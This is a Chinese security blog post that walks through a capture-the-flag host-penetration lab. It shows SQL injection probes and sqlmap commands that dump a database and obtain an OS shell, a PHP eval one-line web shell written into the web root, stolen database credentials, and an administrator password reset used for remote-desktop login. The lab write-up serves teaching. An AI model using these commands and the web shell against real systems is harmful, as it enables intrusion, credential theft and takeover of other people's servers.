freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CTF之主机渗透系列二
FreeBuf_327833 2019-11-22 11:42:07 247608

文章来源:知了堂冯老师原创

v2-eec5e37af1e4a1b398d537a7c1e7acab_hd.j


知了堂禁卫安全实验室(冯万忠.GoDun.F-原创)

0x00 介绍

接着上一篇,咱们继续。还是那句话,请大家任何工具使用均来自互联网,涉及到的技术仅用于教学,不得用于非法用途,请遵守国家安全法律法规,做一个正能量的安全人员,为国家安全奉献自己的绵薄之力。

0x01实战

第一步:首先打开连接地址: http://202.0.0.207

第二步:寻找漏洞点,点击页面的时候,我们看到是PHP的网站,以及url中的参数名为cid,那我们可以使用sql注入试试,看是否存在sql注入漏洞

我们使用手工判断方法:

http://202.0.0.207/product.php?cid=3’, 页面异常

http://202.0.0.207/product.php?cid=3 and 1=1,正常

http://202.0.0.207/product.php?cid=3 and 1=2,异常

从而判断此处一定存在sql注入漏洞,且参数类型为整型。

这里我们可以使用盲注来手工注入。因为sqlmap也支持盲注类型,所有为了节约时间我们就使用sqlmap来脱库吧!

第二步:使用sqlmap来脱库

sqlmap -u http://202.0.0.207/product.php?cid=3

此参数爆出时间盲注和联合注入攻击可以实现。

接下来我们直接开始跑库吧

sqlmap -u http://202.0.0.207/product.php?cid=3 –dbs

我们选择510cms数据库来爆吧

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms –tables

再来爆510_admin试试

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin --columns

 

接下来爆数据

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin -C id,mid,name,passwd,remark –dump

然后我们想要admin用户的密码:8dbdf8221fcf4bd6ac5a48317baa948c,在线MD5解密后得到密码为adminlwphp

第三步:我们接下来就去找后台登录页面了

这里我使用御剑后台扫描器

 

首先我们还是看登录页面的源码,看是不是有flag,果然如此,在这里拿到一个flag3{d3eac3a68b7d3863cc7bd45ba948195d}

接下来我们使用爆库出来的管理员账户和密码登录:admin/ adminlwphp,登录成功

第四步:胡乱捣腾

进入后台后,现在也只有到处去收集有用信息,看下有没有直接拿flag的地方了。一不小心,突然看到了网站绝对路径C:/www/,那根据前面爆出的sql注入漏洞,我们能不能拿到cmdshell呢?我们接下来尝试一下

sqlmap -u http://202.0.0.207/product.php?cid=3 --os-shell

果然拿到了cmdshell,真XX是一个惊喜,那么我们接下就看下现在拥有的系统权限是什么

第五步:一句话木马上传及利用

接下来就直接写入一句话木马了

echo ^<?php @eval($_POST[pass]);?^>>C:/WWW/shell.php

接下来我们上菜刀工具

连接成功

第六步:胡乱捣腾

下面看到这么多页面心头就开始发慌,又得漫山遍野的去收集flag了,

在网站根目录发现flag.php文件,发现flag1=flag1{6ab7c0c46b171d04f1cab922c2f9f017}

花了10多分钟,再也没有找到flag,那只有想其他的办法了。在configs中找到config.php,这个是数据库的配置文件,我们得到了数据库连接的账户root密码为windpasssql

我们使用菜刀对数据库进行连接

提交后,连接成功

继续看这里有没有flag,又拿到一个flag=flag2{981c05134c56092b83b3e9c9b4116ac1}

我们使用菜刀工具进入虚拟终端,看下目前的权限是什么,需要提权不?结果发现是system权限,

执行命令netstat -an查看3389端口已经开启

et user administrator godun.f

修改管理员密码为godun.f,

然后远程桌面登录远程主机

 

 

拿到flag=flag4{e97950cb2dea110c53cb599abc826268}

拿到了4个flag,还有一个不知道藏在哪里,我们还得继续找,找了半天,最后在,C盘的根目录下找到了flag5{c3bc1e7b8325d75816e1ca8ae5ae72ad}

最后,到此为止,5个flag全部找出来了,接下来我们把5个flag放入答题框

本次打靶成功结束,希望能够给大家一点思路!!!

本系列持续更新中,欢迎关注!有问题也可以加知了小姐姐微信噢!ChilFun-Y

信安干货,请关注专栏:https://zhuanlan.zhihu.com/c_1142392164838404096

# 渗透测试 # CTF # 知了堂
本文为 FreeBuf_327833 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
禁卫实验室
FreeBuf_327833 LV.1
加知了小姐姐VX:ChillFun-Y了解更多有关信安课程信息!
  • 25 文章数
  • 10 关注者
你关心的网络安就业岗位薪资,都在这里
2020-03-27
初学web安全的建议
2020-03-26
【学员笔记】LINUX随堂笔记(十三):Keepalive+lvs主从dr负载均衡
2019-12-03